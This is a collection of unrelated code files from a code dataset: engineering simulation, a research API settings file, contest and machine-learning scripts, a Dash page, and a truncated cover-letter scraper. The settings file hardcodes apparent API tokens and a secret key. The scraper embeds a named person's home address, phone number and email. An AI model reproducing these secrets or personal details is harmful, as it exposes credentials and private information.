+{"seq_id":"209871676","text":"\ndef leer_linea(archivo):\n \"\"\"\n This function reads a single line of the csv file and returns a list with\n the values on that line.\n\n Author:...\n \"\"\"\n linea = archivo.readline()\n lista_linea = linea.rstrip('\\n').split(',')\n \n return lista_linea\n \n\ndef configuracion():\n \"\"\"\n The data is taken from the csv file and a list is returned with the numeric values\n found in it.\n\n Author:...\n \"\"\"\n archivo_abierto = open(\"configuracion.csv\")\n lista_linea = leer_linea(archivo_abierto)\n valores = []\n while lista_linea != [''] :\n valor = lista_linea[1]\n valores.append(int(valor))\n lista_linea = leer_linea(archivo_abierto)\n \n \n return valores\n \n\n\n\n\n","sub_path":"configuracion.py","file_name":"configuracion.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"545698303","text":"# -*- coding: utf-8 -*-\n# ---\n# jupyter:\n# jupytext:\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.3.3\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\nimport numpy as np\nfrom scipy.sparse.linalg import spsolve\nfrom scipy.sparse import csr_matrix\nimport sys\nimport time\n\n\ndef inputdata(fnameR,nod,nfree): # data path, nodes per element, degrees of freedom per node\n f=open(fnameR,'r') \n text=f.readline() # read one line at a time\n text=text.strip() # strip surrounding whitespace and the newline (\\n)\n text=text.split() # split into a list of whitespace-separated tokens\n npoin=int(text[0]) # number of nodes\n nele =int(text[1]) # number of elements\n npfix=int(text[2]) # number of restrained nodes\n nlod =int(text[3]) # number of loaded nodes\n delta_t =float(text[4]) # time step size\n n_t =int(text[5]) # number of time steps\n # array declarations\n ae =np.zeros((10,nele),dtype=np.float64) # element properties \n node =np.zeros((nod+1,nele),dtype=np.int) # element connectivity\n x =np.zeros((3,npoin),dtype=np.float64) # coordinates\n mpfix =np.zeros((n_t+1, nfree,npoin),dtype=np.int) # restraint state\n rdis =np.zeros((n_t+1, nfree,npoin),dtype=np.float64) # prescribed displacements\n fp =np.zeros((n_t+1, nfree*npoin),dtype=np.float64) # external loads\n # element properties: ae\n for i in range(0,nele):\n text=f.readline()\n text=text.strip()\n text=text.split()\n ae[0,i] =float(text[0]) # E\n ae[1,i] =float(text[1]) # Po\n ae[2,i] =float(text[2]) # A \n ae[3,i] =float(text[3]) # Ix\n ae[4,i] =float(text[4]) # Iy\n ae[5,i] =float(text[5]) # Iz\n ae[6,i] =float(text[6]) # mass\n ae[7,i] =float(text[7]) # gkx\n ae[8,i] =float(text[8]) # gky\n ae[9,i] =float(text[9]) # gkz\n\n # element connectivity: node\n for i in range(0,nele):\n text=f.readline()\n text=text.strip()\n text=text.split()\n node[0,i]=int(text[0]) 
#node_1\n node[1,i]=int(text[1]) #node_2\n node[2,i]=int(text[2]) # element number\n \n # coordinates: x\n for i in range(0,npoin):\n text=f.readline()\n text=text.strip()\n text=text.split()\n x[0,i]=float(text[0]) # x-coordinate\n x[1,i]=float(text[1]) # y-coordinate\n x[2,i]=float(text[2]) # z-coordinate\n \n for j in range(0, n_t+1):\n # boundary conditions (restraint state) (0:free, 1:restricted)\n for i in range(0,npfix):\n text=f.readline()\n text=text.strip()\n text=text.split()\n lp=int(text[0]) # number of the restrained node\n mpfix[j,0,lp-1]=int(text[1]) # fixed in x-direction\n mpfix[j,1,lp-1]=int(text[2]) # fixed in y-direction\n mpfix[j,2,lp-1]=int(text[3]) # fixed in z-direction\n mpfix[j,3,lp-1]=int(text[4]) # rotation about x-axis fixed\n mpfix[j,4,lp-1]=int(text[5]) # rotation about y-axis fixed\n mpfix[j,5,lp-1]=int(text[6]) # rotation about z-axis fixed\n rdis[j,0,lp-1]=float(text[7]) # prescribed displacement in x-direction\n rdis[j,1,lp-1]=float(text[8]) # prescribed displacement in y-direction\n rdis[j,2,lp-1]=float(text[9]) # prescribed displacement in z-direction\n rdis[j,3,lp-1]=float(text[10]) # prescribed rotation about x-axis\n rdis[j,4,lp-1]=float(text[11]) # prescribed rotation about y-axis\n rdis[j,5,lp-1]=float(text[12]) # prescribed rotation about z-axis \n\n # loads\n for i in range(0,nlod):\n text=f.readline()\n text=text.strip()\n text=text.split()\n lp=int(text[0]) \n fp[j,6*lp-6]=float(text[1]) # load in x-direction\n fp[j,6*lp-5]=float(text[2]) # load in y-direction\n fp[j,6*lp-4]=float(text[3]) # load in z-direction\n fp[j,6*lp-3]=float(text[4]) # moment about x-axis\n fp[j,6*lp-2]=float(text[5]) # moment about y-axis\n fp[j,6*lp-1]=float(text[6]) # moment about z-axis\n f.close()\n return npoin,nele,npfix,nlod,delta_t,n_t,ae,node,x,mpfix,rdis,fp\n\n\n# build the element stiffness matrix (local coordinates)\ndef sm_3dfrm(EA,GJ,EIy,EIz,x1,y1,z1,x2,y2,z2):\n ek=np.zeros((12,12),dtype=np.float64) # local stiffness matrix\n xx=x2-x1\n yy=y2-y1\n zz=z2-z1\n el=np.sqrt(xx**2+yy**2+zz**2)\n ek[ 0, 0]= EA/el\n ek[ 0, 6]=-EA/el\n ek[ 1, 1]= 12*EIz/el**3\n ek[ 1, 5]= 6*EIz/el**2\n ek[ 1, 7]=-12*EIz/el**3\n ek[ 1,11]= 6*EIz/el**2\n ek[ 2, 2]= 12*EIy/el**3\n ek[ 2, 4]= -6*EIy/el**2\n ek[ 2, 8]=-12*EIy/el**3\n ek[ 2,10]= -6*EIy/el**2\n ek[ 3, 3]= GJ/el\n ek[ 3, 9]=-GJ/el\n ek[ 4, 2]= -6*EIy/el**2\n ek[ 4, 4]= 4*EIy/el\n ek[ 4, 8]= 6*EIy/el**2\n ek[ 4,10]= 2*EIy/el\n ek[ 5, 1]= 6*EIz/el**2\n ek[ 5, 5]= 4*EIz/el\n ek[ 5, 7]= -6*EIz/el**2\n ek[ 5,11]= 2*EIz/el\n ek[ 6, 0]=-EA/el\n ek[ 6, 6]= EA/el\n ek[ 7, 1]=-12*EIz/el**3\n ek[ 7, 5]= -6*EIz/el**2\n ek[ 7, 7]= 12*EIz/el**3\n ek[ 7,11]= -6*EIz/el**2\n ek[ 8, 2]=-12*EIy/el**3\n ek[ 8, 4]= 6*EIy/el**2\n ek[ 8, 8]= 12*EIy/el**3\n ek[ 8,10]= 6*EIy/el**2\n ek[ 9, 3]=-GJ/el\n ek[ 9, 9]= GJ/el\n ek[10, 2]= -6*EIy/el**2\n ek[10, 4]= 2*EIy/el\n ek[10, 8]= 6*EIy/el**2\n ek[10,10]= 4*EIy/el\n ek[11, 1]= 6*EIz/el**2\n ek[11, 5]= 2*EIz/el\n ek[11, 7]= -6*EIz/el**2\n ek[11,11]= 4*EIz/el\n return ek\n\n\ndef mass_3dfrm(ae_mass, npoin, nfree):\n # add sentinel entries at both ends\n mass = np.append(ae_mass, 0.0)\n mass = np.insert(mass, 0, 0.0) \n ret = np.zeros((npoin*nfree, npoin*nfree), dtype=np.float64)\n node_mass_array = np.zeros(npoin, dtype=np.float64)\n for i in range(0, len(mass) - 1):\n node_mass = (mass[i] + mass[i+1]) / 2.0\n node_mass_array[i] = node_mass\n for j in range(3):\n idx = i*nfree + j\n ret[idx,idx] = node_mass\n return ret, node_mass_array\n\n\n# gamma: mass-proportional, omega: stiffness-proportional (Rayleigh damping)\ndef dumping_3dfrm(gamma, omega, mass_mat, k):\n m = gamma * mass_mat\n ret = omega * k \n for i in range(0, len(ret)):\n ret[i, i] += m[i, i] \n return ret\n\n\n# build the CDM (central difference method) coefficient matrix\ndef cdm_3dfrm(delta_t, mass_mat, c_mat):\n c_mat = (1.0/(2*delta_t))*c_mat\n for i in range(0, len(c_mat)):\n c_mat[i, i] += (1.0/(delta_t*delta_t))*mass_mat[i, i] \n return c_mat\n\n\ndef main_3d_CDM_FEM(file_path):\n start=time.time()\n args = sys.argv\n fnameR=args[1]\n fnameW=args[2]\n nod=2\n nfree=6 \n gamma=0.0 # damping param\n omega=0.0 # damping param\n 
npoin,nele,npfix,nlod,delta_t,n_t,ae,node,x,mpfix,rdis,fp=inputdata(file_path, nod,nfree)\n mass_mat=mass_3dfrm(ae[6], npoin, nfree) \n acc=np.zeros((n_t+1, nfree*npoin), dtype=np.float64)\n vec=np.zeros((n_t+1, nfree*npoin), dtype=np.float64)\n dis=np.zeros((n_t+1, nfree*npoin), dtype=np.float64)\n # U_-1: fictitious displacement one step before the start\n dis_negative1=dis[0] - delta_t*vec[0] + (delta_t*delta_t/2)*acc[0] \n for step in range(1, n_t+1):\n ir=np.zeros(nod*nfree, dtype=np.int) \n gk=np.zeros((nfree*npoin, nfree*npoin), dtype=np.float64) # Global stiffness matrix\n \n # assemble stiffness matrix & load vector\n for ne in range(0, nele):\n i=node[0,ne]-1\n j=node[1,ne]-1\n m=node[2,ne]-1\n x1=x[0,i]; y1=x[1,i]; z1=x[2,i]\n x2=x[0,j]; y2=x[1,j]; z2=x[2,j]\n ee =ae[0,m] # elastic modulus\n po =ae[1,m] # Poisson's ratio\n aa =ae[2,m] # section area\n aix =ae[3,m] # torsional constant\n aiy =ae[4,m] # moment of inertia around y-axis\n aiz =ae[5,m] # moment of inertia around z-axis\n mass =ae[6,m] # unit weight of material\n gkX =ae[7,m] # seismic coefficient in X-direction\n gkY =ae[8,m] # seismic coefficient in Y-direction\n gkZ =ae[9,m] # seismic coefficient in Z-direction\n A=aa # section area\n EA=ee*aa\n GJ=ee/2/(1+po)*aix\n EIy=ee*aiy\n EIz=ee*aiz\n ek =sm_3dfrm(EA,GJ,EIy,EIz,x1,y1,z1,x2,y2,z2) # local Stiffness matrix \n ir[11]=6*j+5; ir[10]=ir[11]-1; ir[9]=ir[10]-1; ir[8]=ir[9]-1; ir[7]=ir[8]-1; ir[6]=ir[7]-1\n ir[5] =6*i+5; ir[4] =ir[5]-1 ; ir[3]=ir[4]-1 ; ir[2]=ir[3]-1; ir[1]=ir[2]-1; ir[0]=ir[1]-1 \n for i in range(0, nod*nfree):\n it=ir[i]\n for j in range(0, nod*nfree):\n jt=ir[j]\n gk[it, jt] = gk[it, jt] + ek[i,j] \n c_mat=dumping_3dfrm(gamma, omega, gk, mass_mat)\n cdm_mat=cdm_3dfrm(delta_t, mass_mat, c_mat)\n # rearrange fp into the effective load vector\n tmp1 = gk\n for i in range(0, len(gk)):\n tmp1[i,i] -= (2.0/(delta_t**2))*mass_mat[i,i]\n \n tmp2 = (-1)*(1.0/(2*delta_t))*c_mat\n for i in range(0, len(c_mat)):\n tmp2[i,i] += (1.0/(delta_t**2))*mass_mat[i,i]\n \n if step==1:\n fp[step] = fp[step] - np.dot(tmp1, dis[step-1]) - np.dot(tmp2, dis_negative1)\n else:\n fp[step] = fp[step] - np.dot(tmp1, dis[step-1]) - np.dot(tmp2, dis[step-2]) \n \n # boundary conditions\n for i in range(0, npoin):\n for j in range(0, nfree):\n if mpfix[step, j, i] == 1:\n iz=i*nfree+j\n fp[step,iz]=0.0\n\n for i in range (0, npoin):\n for j in range(0, nfree):\n if mpfix[step, j, i] == 1:\n iz=i*nfree+j\n cdm_mat[:,iz]=0.0\n cdm_mat[iz,iz]=1.0\n \n # store as a compressed sparse matrix\n sp_cdm_mat = csr_matrix(cdm_mat)\n dis[step] = spsolve(sp_cdm_mat, fp[step], use_umfpack=True)\n \n # re-apply the prescribed restraint values\n for i in range(0, npoin):\n for j in range(0, nfree):\n if mpfix[step, j, i] == 1:\n iz=i*nfree+j\n dis[step, iz] = rdis[step, j, i] \n \n # compute velocity and acceleration \n if (step==1):\n acc[step-1] = (1.0/(delta_t**2))*(dis_negative1 - 2*dis[step-1] - dis[step])\n vec[step-1] = (1.0/(2*delta_t))*(dis[step]-dis_negative1)\n else:\n acc[step-1] = (1.0/(delta_t**2))*(dis[step-2] - 2*dis[step-1] - dis[step])\n vec[step-1] = (1.0/(2*delta_t))*(dis[step]-dis[step-2])\n \n dtime=time.time()-start\n print('time: {0:.3f}'.format(dtime)+'sec')\n return dis\n","sub_path":"python/jupyter_notebook/other-dynamic-FEM-methods/.ipynb_checkpoints/3D_CDM_FEM-checkpoint.py","file_name":"3D_CDM_FEM-checkpoint.py","file_ext":"py","file_size_in_byte":10976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"214760106","text":"MAAP_API_URL = \"https://api.dit.maap-project.org/api\"\nPROJECT_QUEUE_PREFIX = \"maap\"\nAPI_HOST_URL = 'http://0.0.0.0:5000/'\n# API_HOST_URL = 
'https://api.maap-project.org/api'\n\n# Flask settings\nFLASK_SERVER_NAME = 'localhost:5000'\nFLASK_DEBUG = True # Do not use debug mode in production\n\n# Flask-Restplus settings\nRESTPLUS_SWAGGER_UI_DOC_EXPANSION = 'list'\nRESTPLUS_VALIDATE = True\nRESTPLUS_MASK_SWAGGER = False\nRESTPLUS_ERROR_404_HELP = False\n\n# CMR settings\n\n# # NASA UAT\n# CMR_URL = 'https://cmr.uat.earthdata.nasa.gov'\n# CMR_API_TOKEN = '4C40153D-6CC6-D01A-58E2-D8F3CAFB5472'\n# CMR_CLIENT_ID = 'maap-api-cmr'\n\nCMR_TOKEN_SERVICE_URL = 'https://cmr.earthdata.nasa.gov/legacy-services/rest/tokens'\n\n# MAAP DEV\nCMR_URL = 'https://cmr.maap-project.org'\nCMR_API_TOKEN = ''\nCMR_CLIENT_ID = ''\nMAAP_WMTS_XML = '/maap-api-nasa/api/maap.wmts.xml'\n\n# GIT settings\nGIT_REPO_URL = 'https://gitlab-ci-token:$TOKEN@repo.dit.maap-project.org/root/register-job.git'\n\n# GTILAB Settings\nGITLAB_TOKEN = 'foobar'\nMAAP_ENVIRONMENT_FILE = 'https://raw.githubusercontent.com/MAAP-Project/maap-jupyter-ide/develop/maap_environments.json'\n\nREPO_NAME = 'register-job'\nREPO_PATH = '/home/ubuntu/repo'\nVERSION = 'master'\nSUPPORTED_EXTENSIONS = ['py', 'java', 'sh']\n\n# Docker container URL\nCONTAINER_URL = 'registry.dit.maap-project.org/root/dps_plot:master'\n\n# HySDS Mozart\nMOZART_URL = 'https://[MOZART_IP]/mozart/api/v0.2'\nDEFAULT_QUEUE = 'test-job_worker-large'\nLW_QUEUE = 'system-jobs-queue'\nHYSDS_LW_VERSION = 'v0.0.5'\nGRQ_REST_URL = 'http://[GRQ_IP]/api/v0.1'\nS3_CODE_BUCKET = 's3://[S3_BUCKET_NAME]'\n\n# Dynamic Tiler API - OLD API\n#\n# Uncomment the `TILER_ENDPOINT` line below if testing api.maap-project.org at this time.\n# api.maap-project.org is using an older version of the Dynamic Tiler API.\n# TILER_ENDPOINT = 'https://8e9mu91qr6.execute-api.us-east-1.amazonaws.com/production'\n\n# Dynamic Tiler API - NEW API\n# The updated WMTS code (api/endpoints/wmts.py) should work with the newer version of the tiler API is deployed at the URL below.\nTILER_ENDPOINT = 'https://d852m4cmf5.execute-api.us-east-1.amazonaws.com'\n\n# 3D Tiles API\n_3DTILES_API_ENDPOINT = 'https://llxbmdibvf.execute-api.us-east-1.amazonaws.com/test'\nDATA_SYSTEM_FILES_PATH = '/file-staging/nasa-map/'\n\n# CAS\nCAS_SECRET_KEY = '9c0d611c-04c5-4f36-b91c-8374b4410590'\nCAS_SERVER_NAME = 'https://auth.dit.maap-project.org/cas'\nCAS_AFTER_LOGIN = 'api.members_self'\nCAS_PROXY_DECRYPTION_TOKEN = ''\n\n# Query Service\nQS_STATE_MACHINE_ARN = 'arn:aws:states:us-east-1:532321095167:stateMachine:maap-api-query-service-dev-RunQuery'\nQS_RESULT_BUCKET = 'maap-api-query-service-dev-query-results'\n\n# AWS\nAWS_REGION = 'us-east-1'\nWORKSPACE_MOUNT_PRIVATE = 'my-private-bucket'\nWORKSPACE_MOUNT_PUBLIC = 'my-public-bucket'\nWORKSPACE_MOUNT_SHARED = 'shared-buckets'\nAWS_SHARED_WORKSPACE_BUCKET_PATH = 'shared'\n\n# DB\nDATABASE_URL='postgresql://localhost/maap_dev'\n\n# OGC API - Features\nOGCAPI_FEATURES_ENDPOINT = \"https://sidgr9d5ak.execute-api.us-west-2.amazonaws.com\"\n","sub_path":"api/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"571637521","text":"#def input():\n# return open(\"data\",\"r\").readline()\n\ndef solve(sub1, sub2):\n result = 0\n for i in range(len(sub2)+1):\n A1 = sub2[:i]\n B1 = sub2[i:]\n A2 = sub1[:i]\n B2 = sub1[-(len(sub2)-i):]\n if i == len(sub2):\n B2 = \"\"\n if A1==A2 and B1==B2:\n result += 1\n return result\n\n\n\nS = input()\nfirst = S[:1]\nlast = S[-1:]\n\nstring = 
last+first\n#print(string)\n\nresult = 0\nfor i in range(int(len(S)/2),len(S)):\n index = S.find(string,i)\n if index != -1 and index < len(S)-2:\n sub1 = S[1:index]\n sub2 = S[index+2:-1]\n result += solve(sub1, sub2)\n\nprint(result)","sub_path":"AtCoder/regular55/takaitai.py","file_name":"takaitai.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"564752850","text":"from core.input_a import ContextCropService\nimport tensorflow as tf\n\n\nflags = tf.flags\nFLAGS = flags.FLAGS\n\n\nclass InputExample(object):\n \"\"\"A single training/test example for simple sequence classification.\"\"\"\n\n SEP = \"#\"\n WORD_SEP = \" \"\n OBJ_MASK = \"O\"\n SUBJ_MASK = \"S\"\n\n def __init__(self, guid, text_a, s_obj, t_obj, text_b=None, label=None):\n \"\"\"Constructs a InputExample.\n\n Args:\n guid: Unique id for the example.\n text_a: string. The untokenized text of the first sequence. For single\n sequence tasks, only this sequence must be specified.\n text_b: (Optional) string. The untokenized text of the second sequence.\n Only must be specified for sequence pair tasks.\n label: (Optional) string. The label of the example. This should be\n specified for train and dev examples, but not for test examples.\n \"\"\"\n\n text_a = self.__optionally_fix_quoted_text(text_a)\n if text_b is not None:\n text_b = self.__optionally_fix_quoted_text(text_b)\n\n self.guid = guid\n self.text_a = InputExample.__process_text_a(text=text_a, s_obj=s_obj, t_obj=t_obj)\n self.text_b = text_b\n self.label = label\n\n @staticmethod\n def __process_text_a(text, s_obj, t_obj):\n assert(isinstance(s_obj, int))\n assert(isinstance(t_obj, int))\n\n terms = text.strip().split(InputExample.WORD_SEP)\n\n cropped_text = ContextCropService.fit_context_vector(\n vector=terms, e1_in=s_obj, e2_in=t_obj,\n expected_size=FLAGS.max_seq_length)\n\n expanded_terms = InputExample.__surround_ends_with_extra_char(\n terms=cropped_text.Value,\n e1_in=cropped_text.StartIndex,\n e2_in=cropped_text.EndIndex)\n\n return InputExample.WORD_SEP.join(expanded_terms)\n\n @staticmethod\n def __optionally_fix_quoted_text(text):\n if text[0] == text[-1] == '\"':\n text = text[1:-1].replace('\"\"', '\"')\n return text\n\n @staticmethod\n def __surround_ends_with_extra_char(terms, e1_in, e2_in):\n \"\"\" Replacing ends in order to find them later, after tokenization\n \"\"\"\n assert(isinstance(terms, list))\n assert(isinstance(e1_in, int))\n assert(isinstance(e2_in, int))\n\n entities = [InputExample.OBJ_MASK, InputExample.SUBJ_MASK]\n\n # NOTE: We additionally remove all the # symbols,\n # however the latter could be done during serialization stage\n # by selecting an appropriate entities formatter.\n terms[e1_in] = terms[e1_in].replace(\"#\", \"\")\n terms[e2_in] = terms[e2_in].replace(\"#\", \"\")\n\n assert(terms[e1_in] in entities)\n assert(terms[e2_in] in entities)\n\n result = []\n for term_index, term in enumerate(terms):\n if term_index == e1_in or term_index == e2_in:\n result.append(InputExample.SEP)\n result.append(term)\n result.append(InputExample.SEP)\n else:\n result.append(term)\n\n return result\n\n","sub_path":"core/input_example.py","file_name":"input_example.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"184458312","text":"#!/usr/bin/env python\n# coding=utf-8\n'''\nAuthor: John\nEmail: johnjim0816@gmail.com\nDate: 2020-11-22 
23:21:53\nLastEditor: John\nLastEditTime: 2021-03-23 16:38:54\nDiscription: \nEnvironment: \n'''\nimport sys,os\nsys.path.append(os.getcwd()) # add current terminal path to sys.path\nfrom itertools import count\nimport datetime\nimport gym\nfrom PolicyGradient.agent import PolicyGradient\nfrom common.plot import plot_rewards\nfrom common.utils import save_results\n\nSEQUENCE = datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\") # obtain current time\nSAVED_MODEL_PATH = os.path.split(os.path.abspath(__file__))[0]+\"/saved_model/\"+SEQUENCE+'/' # path to save model\nif not os.path.exists(os.path.split(os.path.abspath(__file__))[0]+\"/saved_model/\"): \n os.mkdir(os.path.split(os.path.abspath(__file__))[0]+\"/saved_model/\")\nif not os.path.exists(SAVED_MODEL_PATH):\n os.mkdir(SAVED_MODEL_PATH)\nRESULT_PATH = os.path.split(os.path.abspath(__file__))[0]+\"/results/\"+SEQUENCE+'/' # path to save rewards\nif not os.path.exists(os.path.split(os.path.abspath(__file__))[0]+\"/results/\"): \n os.mkdir(os.path.split(os.path.abspath(__file__))[0]+\"/results/\")\nif not os.path.exists(RESULT_PATH): \n os.mkdir(RESULT_PATH)\n\nclass PGConfig:\n def __init__(self):\n self.train_eps = 300 # 训练的episode数目\n self.batch_size = 8\n self.lr = 0.01 # learning rate\n self.gamma = 0.99\n self.hidden_dim = 36 # dimmension of hidden layer\n \ndef train(cfg,env,agent):\n '''下面带pool都是存放的transition序列用于gradient'''\n state_pool = [] # 存放每batch_size个episode的state序列\n action_pool = []\n reward_pool = [] \n ''' 存储每个episode的reward用于绘图'''\n rewards = []\n ma_rewards = []\n for i_episode in range(cfg.train_eps):\n state = env.reset()\n ep_reward = 0\n for _ in count():\n action = agent.choose_action(state) # 根据当前环境state选择action\n next_state, reward, done, _ = env.step(action)\n ep_reward += reward\n if done:\n reward = 0\n state_pool.append(state)\n action_pool.append(float(action))\n reward_pool.append(reward)\n state = next_state\n if done:\n print('Episode:', i_episode, ' Reward:', ep_reward)\n break\n if i_episode > 0 and i_episode % cfg.batch_size == 0:\n agent.update(reward_pool,state_pool,action_pool)\n state_pool = [] # 每个episode的state\n action_pool = []\n reward_pool = []\n rewards.append(ep_reward)\n if ma_rewards:\n ma_rewards.append(\n 0.9*ma_rewards[-1]+0.1*ep_reward)\n else:\n ma_rewards.append(ep_reward)\n print('complete training!')\n return rewards, ma_rewards\n \nif __name__ == \"__main__\":\n cfg = PGConfig()\n env = gym.make('CartPole-v0') # 可google为什么unwrapped gym,此处一般不需要\n env.seed(1) # 设置env随机种子\n state_dim = env.observation_space.shape[0]\n action_dim = env.action_space.n\n agent = PolicyGradient(state_dim,cfg)\n rewards, ma_rewards = train(cfg,env,agent)\n agent.save_model(SAVED_MODEL_PATH)\n save_results(rewards,ma_rewards,tag='train',path=RESULT_PATH)\n plot_rewards(rewards,ma_rewards,tag=\"train\",algo = \"Policy Gradient\",path=RESULT_PATH)\n","sub_path":"codes/PolicyGradient/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"181064116","text":"### Data\nimport yaml\n### Dash\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\n\nfrom navbar import Navbar\nfrom footer import Footer\n\nnav = Navbar()\nfooter = Footer()\n\n# Load team members\nwith open(\"assets/team_members/team.yml\") as f:\n members = yaml.load(f, Loader=yaml.FullLoader)\nnum_members = len(members)\n\nwith open(\"assets/collaborators/organizations.yml\") as f:\n collaborators = 
yaml.load(f, Loader=yaml.FullLoader)\nnum_collaborators = len(collaborators)\n\n# Single member pic\ndef member_pic(member):\n return dbc.Col(\n [\n dbc.Card(\n [\n dbc.CardImg(src='assets/team_members/photos/%s' % member['photo']),\n dbc.CardBody(\n html.A(member['name'],\n href=member['website'],\n className=\"stretched-link team-name\"),\n className=\"team-card-body\",\n ),\n ],\n className=\"team-card h-100 w-100\"\n )\n ],\n xs=12,\n sm=6,\n md=3,\n lg=3,\n xl=2,\n style={'marginBottom': 7}\n )\n\n# Single collaborator pic\ndef collab_pic(collaborator):\n return dbc.Col(\n [\n html.A([\n html.Div(\n [\n html.Img(\n src='assets/collaborators/photos/%s' % collaborator['photo'],\n className=\"collabs\"\n ),\n ],\n style={'display': 'inline-block'}\n )\n ], href=collaborator['website'])\n ],\n width='auto',\n )\n\n# Table rows\nmember_rows = \\\n [\n dbc.Row(\n [\n member_pic(members[0])\n ],\n justify=\"around\"\n )\n ] + \\\n [\n dbc.Row(\n [\n member_pic(members[i]) for i in range(1,num_members)\n ],\n justify=\"around\",\n )\n ]\n\ncollab_rows = \\\n [\n dbc.Row(\n [\n collab_pic(collaborators[i]) for i in range(num_collaborators)\n ],\n justify=\"around\",\n )\n ]\n\nbody = dbc.Container(\n [\n dbc.Row(\n [\n dbc.Col(\n [\n html.H2(\"Our Team\"),\n html.P('Our team comprises passionate researchers in Operations Research \\\n and Analytics. We are eager to use our collective skills and create new \\\n tools that can help the scientific community fight against the pandemic.')\n ]\n )\n ],\n style={'marginBottom': 20}\n )\n ] + member_rows +\n [dbc.Row(\n [\n dbc.Col(\n [\n html.H2(\"Our Collaborators\"),\n ]\n )\n ],\n style={'marginBottom': 20,'marginTop': 40}\n )\n ] + collab_rows,\n className=\"page-body\"\n )\n\ndef Team():\n layout = html.Div([nav, body, footer],className=\"site\")\n return layout\n","sub_path":"about_us/team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"181148385","text":"import datetime\nimport docx\nfrom docx.enum.text import WD_ALIGN_PARAGRAPH\nfrom docx.shared import Pt\nfrom selenium import webdriver\n\n\n## Data collecting without API\n\nprint(\"Welcome to Cover Letter Premium!\")\nprint(\"------------------------------\")\njob_url = \"https://www.linkedin.com/jobs/view/1347102437/\" # input(\"please input your URL: \")\n\n\n\n# MAKE SURE TO SET ENGLISH AS THE LANGUAGE\n# source: https://sqa.stackexchange.com/questions/9904/how-to-set-browser-locale-with-chromedriver-python#\noptions = webdriver.ChromeOptions()\n#options.add_experimental_option(\"prefs\", {\"intl.accept_languages\": \"es\"}) # THIS WORKS - GETS SPANISH\noptions.add_experimental_option(\"prefs\", {\"intl.accept_languages\": \"en,en_US\"})\n\n# download chromedriver from http://chromedriver.chromium.org/downloads\n# and replace the path with where you download it\ndriver = webdriver.Chrome(\"/usr/local/bin/chromedriver\", chrome_options=options)\n\n\n\n\ndriver.get(job_url)\nprint(driver.title)\n\n\n\nbreakpoint()\n\n\n\njob_info = driver.find_element_by_tag_name('title').get_attribute('text')\n\nprint(job_info) #> 'Accenture hiring Software Developer Engineer - Associate Manager - Denver, CO in Denver, CO, US | LinkedIn'\n\ninfo_list = job_info.split('hiring')\ntitle = info_list[1]\ncompany = info_list[0]\ndescription = driver.find_element_by_css_selector(\"div.description__text--rich\").text\n\njob_dict = {\n\t'title': title,\n\t'company': company,\n\t'description': 
description\n}\n\nprint(job_dict)\n\n\ndriver.quit()\n\n\n\n\n\n\n\n\n\n#breakpoint()\n\n\n## user profile\nuser_name = \"Ruolin Gou\"\nuser_status = \"Master's student\"\nuser_major = \"Social and Consumer Psychology Program\"\nuser_address = \"10 River rd, Apt 4N, New York, NY, 10044\"\nuser_phone = \"646-243-0136\"\nuser_email = \"rg@3556@nyu.edu\"\n\n## STARTING\n# March, 30th, 2019\ntoday = datetime.date.today()\nF_today = today.strftime(\"%B, %d, %Y\")\n# print(F_today)\n\n# company_name = \"Phoenix Marketing International\"\ncompany_name = job_dict[\"company\"]\ncompany_address_1 = \"1430 Broadway, 19th Floor\"\ncompany_address_2 = \"New York, NY 10018\"\n\nstart = f\"\"\"\n{F_today}\n\n{company_name}\n{company_address_1}\n{company_address_2}\n\"\"\"\nprint(start)\n\n## BOBY CONTENTS\n# job_title = \"Market research Intern\"\njob_title = job_dict[\"title\"]\n\nskill_1 = \"analytical\" # = filtered_1\nskill_2 = \"market reserch\" # = filtered_2\nskill_3 = \"communication\" # = filtered_3\nintro_p = f\"I want to express my immense interest in the opportunity of the {job_title} at {company_name}. I am a {user_status.lower()} in the {user_major} at NYU graduating in 2020. For this {job_title} position, I am excited to apply my market research and consumer behavior knowledge to real-world situations and learn valuable experience from industry professionals. I believe that my qualifications and educational pursuits are a great fit with the kind of candidate you company is looking for. Given my passion and knowledge, I would be able to contribute to this role immediately.\"\nanalytical_research = \"I know this position requires strong analytical and research ability, and my previous research experiences strongly supported my competence. I worked as a research assistant in two psychology labs at Willamette University for three years and actively engaged in both experimental design and data analysis processes. The complicated experimental design procedure improved my skills of thorough design and organization and attention to details. The data analysis processes, including data coding, cleaning, analysis, visualization, and interpretation, gave me great opportunities to apply my statistical knowledge and strengthen my analytical skills. From my current master program, I have learned market research methods and design thinking, using interviews, focus groups, and other qualitative methods to achieve human-centered designs. I am trained to apply psychological theories to the marketing industry and be familiar with qualitative research and analysis as well.\"\n\ncommunication = \"Additionally, my communication skills gained good practice during my research experience. During the data collection, I have to understand the purpose of my supervisors and transmit correct information to experiment participants to gain expected and unbiased results. 
